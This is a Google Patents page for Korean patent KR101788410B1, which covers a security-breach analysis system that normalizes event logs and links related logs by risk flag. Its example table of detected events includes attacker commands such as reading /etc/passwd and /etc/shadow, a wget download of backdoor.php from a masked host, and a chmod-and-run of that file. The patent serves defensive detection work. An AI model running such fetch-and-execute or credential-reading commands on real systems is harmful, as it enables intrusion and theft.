KR101788410B1 - 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 - Google Patents
보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 Download PDFInfo
- Publication number
- KR101788410B1 KR101788410B1 KR1020150161973A KR20150161973A KR101788410B1 KR 101788410 B1 KR101788410 B1 KR 101788410B1 KR 1020150161973 A KR1020150161973 A KR 1020150161973A KR 20150161973 A KR20150161973 A KR 20150161973A KR 101788410 B1 KR101788410 B1 KR 101788410B1
- Authority
- KR
- South Korea
- Prior art keywords
- event
- log
- event log
- security
- contents
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000004458 analytical method Methods 0.000 title claims abstract description 112
- 238000000034 method Methods 0.000 claims abstract description 14
- 238000001514 detection method Methods 0.000 claims description 126
- 238000010606 normalization Methods 0.000 claims description 22
- 238000005259 measurement Methods 0.000 claims description 10
- 238000012351 Integrated analysis Methods 0.000 abstract description 2
- 239000000284 extract Substances 0.000 description 5
- 238000010586 diagram Methods 0.000 description 4
- 230000000694 effects Effects 0.000 description 4
- 238000004364 calculation method Methods 0.000 description 3
- 238000002347 injection Methods 0.000 description 3
- 239000007924 injection Substances 0.000 description 3
- 230000009545 invasion Effects 0.000 description 2
- 239000000463 material Substances 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 230000008520 organization Effects 0.000 description 2
- 238000012545 processing Methods 0.000 description 2
- 230000008685 targeting Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 230000000903 blocking effect Effects 0.000 description 1
- 238000004891 communication Methods 0.000 description 1
- 239000002131 composite material Substances 0.000 description 1
- 238000004590 computer program Methods 0.000 description 1
- 238000012217 deletion Methods 0.000 description 1
- 230000037430 deletion Effects 0.000 description 1
- 230000001419 dependent effect Effects 0.000 description 1
- 238000005516 engineering process Methods 0.000 description 1
- 238000012806 monitoring device Methods 0.000 description 1
- 230000002265 prevention Effects 0.000 description 1
- 238000012502 risk assessment Methods 0.000 description 1
- 239000000243 solution Substances 0.000 description 1
- 230000002123 temporal effect Effects 0.000 description 1
- 229960005486 vaccine Drugs 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/30—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
- H04L63/308—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information retaining data, e.g. retaining successful, unsuccessful communication attempts, internet access, or e-mail, internet telephony, intercept related information or call content
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Technology Law (AREA)
- Debugging And Monitoring (AREA)
Abstract
본 발명에 따르면 다양한 형태의 로컬단말기에 가해지는 보안 침해를 정규화된 이벤트로그로 기록하여 통합 분석할 수 있고, 특정 정보와 연계된 이벤트로그를 분류하여 분석함으로써 쉽게 보안 침해 요소를 파악할 수 있는 효과가 있다.
Description
도 2는 본 발명의 실시예에 따른 보안침해 분석시스템의 구조와 연결상태를 나타낸 블럭도.
도 3은 본 발명의 분석시스템을 이용한 보안침해 분석방법의 과정을 나타낸 순서도.
도 4는 이벤트탐지룰DB에 포함된 탐지룰의 일례를 나타낸 테이블.
도 5a와 5b는 이벤트로그에 대한 연계분석을 한 결과를 나타낸 테이블.
이벤트탐지룰DB 컬럼 | 정의 |
logType | 탐지대상이 되는 보안 이벤트 |
keyword | 단일 보안 이벤트 탐지에 사용되는 문자열 키워드 |
history | 보안 관리자가 기록한 탐지룰의 이력 |
registertime | 탐지룰의 생성일 |
supervisionid | 탐지룰을 등록한 보안 관리자/시스템의 고유값 |
cnt | 탐지룰의 인덱스 번호 |
flag | 위험도 플래그 |
필드 | 정의 |
TIME | 보안 이벤트의 탐지 시각 |
TYPE | 보안 이벤트의 유형 |
HOST | 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임 |
SRC | 보안 이벤트의 출발지의 IP |
DST | 보안 이벤트의 목적지의 IP |
CONTENTS_001 ~ CONTENTS_004 | 보안 이벤트에서 발생하는 상세 내용 |
LINKED_LOGTYPE | 보안 이벤트 연계분석 대상 |
INDEX | TIMELINE | 보안이벤트 로그 | 탐지 내용 설명 |
1 | 2015년10월01일 오전11시10분24초 |
detectionlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템을 대상으로 SQL Injection 공격탐지 위험도 플래그 결정: 위험도 플래그 값이 2로 연계분석 대상으로 결정 정규화 컬럼 LINKED_LOGTYPE에 선언되어진 이벤트로그를 대상으로 연계분석을 실시 |
2 | 2015년10월01일 오전11시10분26초 |
waflogs | 125.141.XX.XX에서 218.15.XX.XX 시스템을 대상으로 SQL Injection 공격탐지 |
3 | 2015년10월01일 오전11시11분26초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
4 | 2015년10월01일 오전11시11분27초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
5 | 2015년10월01일 오전11시11분29초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
6 | 2015년10월01일 오전11시11분29초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
7 | 2015년10월01일 오전11시11분31초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 시도 실패 탐지 |
8 | 2015년10월01일 오전11시11분33초 |
securelogs | 125.141.XX.XX에서 218.15.XX.XX 시스템 SSH 접근 성공 탐지 |
9 | 2015년10월01일 오전11시20분32초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/passwd 명령 수행을 통해 파일 열람 이력 탐지 |
10 | 2015년10월01일 오전11시20분40초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/shadows 명령 수행을 통해 파일 열람 이력 탐지 |
11 | 2015년10월01일 오전11시20분55초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 vim /etc/hosts 명령 수행을 통해 파일 열람 이력 탐지 |
12 | 2015년10월01일 오전11시21분05초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 wget http:xxx.xx.xx/backdoor.php 다운로드 명령 수행 탐지 |
13 | 2015년10월01일 오전11시21분06초 |
httpdlogs | 218.15.XX.XX 시스템에서 http:xxx.xx.xx/backdoor.php 파일이 다운로드 패킷 보안 이벤트 탐지 |
14 | 2015년10월01일 오전11시21분56초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 mv backdoor.php /tmp/system.php 명령 수행 탐지 |
15 | 2015년10월01일 오전11시22분01초 |
cmdlogs | 125.141.XX.XX에서 218.15.XX.XX 시스템으로 접속한 사용자가 chmod 777 /tmp/system.php; php /tmp/system.php 명령 수행 탐지 |
16 | 2015년10월01일 오전11시22분05초 |
dnslogs | 218.15.XX.XX 시스템에서 악성사이트로 추정되는 도메인 질의 탐지 |
17 | 2015년10월01일 오전11시22분06초 |
dnslogs | 218.15.XX.XX 시스템에서 악성사이트로 추정되는 도메인 질의 탐지 |
18 | 2015년10월01일 오전11시22분07초 |
dnslogs | 218.15.XX.XX 시스템에서 악성사이트로 추정되는 도메인 질의 탐지 |
19 | 2015년10월01일| 오전11시22분47초 |
infectedlogs | 218.15.XX.XX 시스템에서 백신 악성코드 탐지 |
20 | 2015년10월01일 오전11시24분01초 |
patchlogs | 218.15.XX.XX 시스템에서 SSL 취약점 탐지 |
21 | 2015년10월01일 오전11시24분12초 |
patchlogs | 218.15.XX.XX 시스템에서 BASH SHELL 취약점 탐지 |
104 : 로그정규화부 106 : 단일이벤트탐지부
108 : 연계분석부 110 : 위험도측정부
112 : 이벤트탐지룰DB 114 : 통합로그DB
200 : 로컬단말기 202 : 로컬로그수집부
300 : 관리자단말기
Claims (8)
- 로컬단말기(200)에서 발생하는 보안 이벤트를 분석하여 관리자에게 제공하는 보안침해 분석시스템으로서,
상기 로컬단말기(200)에 설치된 로컬로그수집부(202)가 수집하여 전송한 이벤트로그를 수신하여 통합로그DB(114)에 저장하는 통합로그수집부(102)와;
상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 로그정규화부(104)와;
이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 단일이벤트탐지부(106)와;
상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 부여된 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 연계분석부(108)와;
상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 위험도측정부(110);를 포함하며,
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며,
TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그이며,
상기 연계분석부(108)는
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템. - 삭제
- 삭제
- 제1항에 있어서,
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서
상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와,
상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석시스템. - 제1항 또는 제4항의 보안침해 분석시스템을 이용한 보안침해 분석방법으로서,
로컬단말기(200)에 설치된 로컬로그수집부(202)가 이벤트로그를 수집하여 전송하면, 통합로그수집부(102)가 수신하여 통합로그DB(114)에 저장하는 제1단계와;
상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 로그정규화부(104)가 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 제2단계와;
단일이벤트탐지부(106)가 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 제3단계와;
위험도측정부(110)가 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 제4단계와;
연계분석부(108)가 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 대한 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 제5단계;를 포함하며,
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며,
TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그이며,
상기 연계분석부(108)는
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며,
탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법. - 삭제
- 삭제
- 제5항에 있어서,
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서
상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와,
상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 하는, 보안 이벤트로그 분석을 통한 보안침해 분석방법.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150161973A KR101788410B1 (ko) | 2015-11-18 | 2015-11-18 | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
KR1020150161973A KR101788410B1 (ko) | 2015-11-18 | 2015-11-18 | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 |
Publications (2)
Publication Number | Publication Date |
---|---|
KR20170058140A KR20170058140A (ko) | 2017-05-26 |
KR101788410B1 true KR101788410B1 (ko) | 2017-10-19 |
Family
ID=59052141
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
KR1020150161973A Active KR101788410B1 (ko) | 2015-11-18 | 2015-11-18 | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 |
Country Status (1)
Country | Link |
---|---|
KR (1) | KR101788410B1 (ko) |
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR20240162797A (ko) | 2023-05-09 | 2024-11-18 | 한전케이디엔주식회사 | 위협헌팅 기반 클라우드 침해사고 탐지 및 대응 시스템 및 그 방법 |
Families Citing this family (9)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR102038926B1 (ko) * | 2018-11-17 | 2019-11-15 | 한국과학기술정보연구원 | 공격자 선정 장치 및 공격자 선정 장치의 동작 방법 |
KR102215228B1 (ko) | 2020-04-13 | 2021-02-10 | 서울과학기술대학교 산학협력단 | 로그 데이터 분석을 통한 프로그램의 중복 접근 패턴 탐지 시스템 및 그 제거 방법 |
KR102158784B1 (ko) * | 2020-05-14 | 2020-09-22 | 주식회사 쿼리시스템즈 | 이기종 보안 장비와 연동하는 보안위협 자동 차단 시스템 |
CN113592690B (zh) * | 2021-07-30 | 2024-03-29 | 卡斯柯信号有限公司 | 一种基于数据库模型的危害管理方法 |
KR102761719B1 (ko) | 2021-10-18 | 2025-02-05 | 주식회사 페스카로 | 보안 이벤트 발생 시간 추정 방법 및 시스템 |
CN114254327A (zh) * | 2021-12-20 | 2022-03-29 | 奇安信科技集团股份有限公司 | 操作系统漏洞检测方法、装置、存储介质及电子设备 |
KR102426889B1 (ko) * | 2022-01-05 | 2022-07-29 | 주식회사 이글루코퍼레이션 | 대용량 이벤트 로그에 대한 로그 타입별 데이터 분석 처리 장치, 방법 및 프로그램 |
CN114826727B (zh) * | 2022-04-22 | 2024-05-07 | 南方电网数字电网研究院有限公司 | 流量数据采集方法、装置、计算机设备、存储介质 |
CN116232751A (zh) * | 2023-03-16 | 2023-06-06 | 中国华能集团有限公司北京招标分公司 | 一种安全告警分析方法 |
-
2015
- 2015-11-18 KR KR1020150161973A patent/KR101788410B1/ko active Active
Cited By (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
KR20240162797A (ko) | 2023-05-09 | 2024-11-18 | 한전케이디엔주식회사 | 위협헌팅 기반 클라우드 침해사고 탐지 및 대응 시스템 및 그 방법 |
Also Published As
Publication number | Publication date |
---|---|
KR20170058140A (ko) | 2017-05-26 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
KR101788410B1 (ko) | 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 | |
JP6863969B2 (ja) | 低信頼度のセキュリティイベントによるセキュリティインシデントの検出 | |
CN111490970A (zh) | 一种网络攻击的溯源分析方法 | |
KR101689298B1 (ko) | 보안이벤트 자동 검증 방법 및 장치 | |
CN114598525A (zh) | 一种针对网络攻击的ip自动封禁的方法和装置 | |
CN107295021B (zh) | 一种基于集中管理的主机的安全检测方法及系统 | |
Wang et al. | NetSpy: Automatic generation of spyware signatures for NIDS | |
US20200106791A1 (en) | Intelligent system for mitigating cybersecurity risk by analyzing domain name system traffic metrics | |
Mualfah et al. | Network forensics for detecting flooding attack on web server | |
US20030083847A1 (en) | User interface for presenting data for an intrusion protection system | |
CN107733699B (zh) | 互联网资产安全管理方法、系统、设备及可读存储介质 | |
KR101768079B1 (ko) | 침입탐지 오탐 개선을 위한 시스템 및 방법 | |
WO2016121348A1 (ja) | マルウェア対策装置、マルウェア対策システム、マルウェア対策方法、及び、マルウェア対策プログラムが格納された記録媒体 | |
CN114640548A (zh) | 一种基于大数据的网络安全感知和预警的方法及系统 | |
US10897472B1 (en) | IT computer network threat analysis, detection and containment | |
CN110868403B (zh) | 一种识别高级持续性攻击apt的方法及设备 | |
CN113660115B (zh) | 基于告警的网络安全数据处理方法、装置及系统 | |
Lee et al. | Sierra: Ranking anomalous activities in enterprise networks | |
KR20130116418A (ko) | Ip 평판 분석 장치, 방법 및 컴퓨터 판독 가능한 기록 매체 | |
KR101767591B1 (ko) | 침입탐지 오탐 개선을 위한 시스템 및 방법 | |
Yang et al. | True attacks, attack attempts, or benign triggers? an empirical measurement of network alerts in a security operations center | |
Kergl et al. | Detection of zero day exploits using real-time social media streams | |
CN111355688A (zh) | 一种基于ai技术自动渗透、分析的核心方法及装置 | |
KR101712462B1 (ko) | Ip 위험군 탐지 시스템 | |
Raut | Log based intrusion detection system |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
A201 | Request for examination | ||
PA0109 | Patent application |
Patent event code: PA01091R01D Comment text: Patent Application Patent event date: 20151118 |
|
PA0201 | Request for examination | ||
E902 | Notification of reason for refusal | ||
PE0902 | Notice of grounds for rejection |
Comment text: Notification of reason for refusal Patent event date: 20170113 Patent event code: PE09021S01D |
|
PG1501 | Laying open of application | ||
E701 | Decision to grant or registration of patent right | ||
PE0701 | Decision of registration |
Patent event code: PE07011S01D Comment text: Decision to Grant Registration Patent event date: 20170822 |
|
PR0701 | Registration of establishment |
Comment text: Registration of Establishment Patent event date: 20171013 Patent event code: PR07011E01D |
|
PR1002 | Payment of registration fee |
Payment date: 20171013 End annual number: 3 Start annual number: 1 |
|
PG1601 | Publication of registration | ||
PR1001 | Payment of annual fee |
Payment date: 20201012 Start annual number: 4 End annual number: 6 |
|
PR1001 | Payment of annual fee |
Payment date: 20230220 Start annual number: 7 End annual number: 7 |
|
PR1001 | Payment of annual fee |
Payment date: 20240304 Start annual number: 8 End annual number: 8 |
|
PR1001 | Payment of annual fee |
Payment date: 20250109 Start annual number: 9 End annual number: 9 |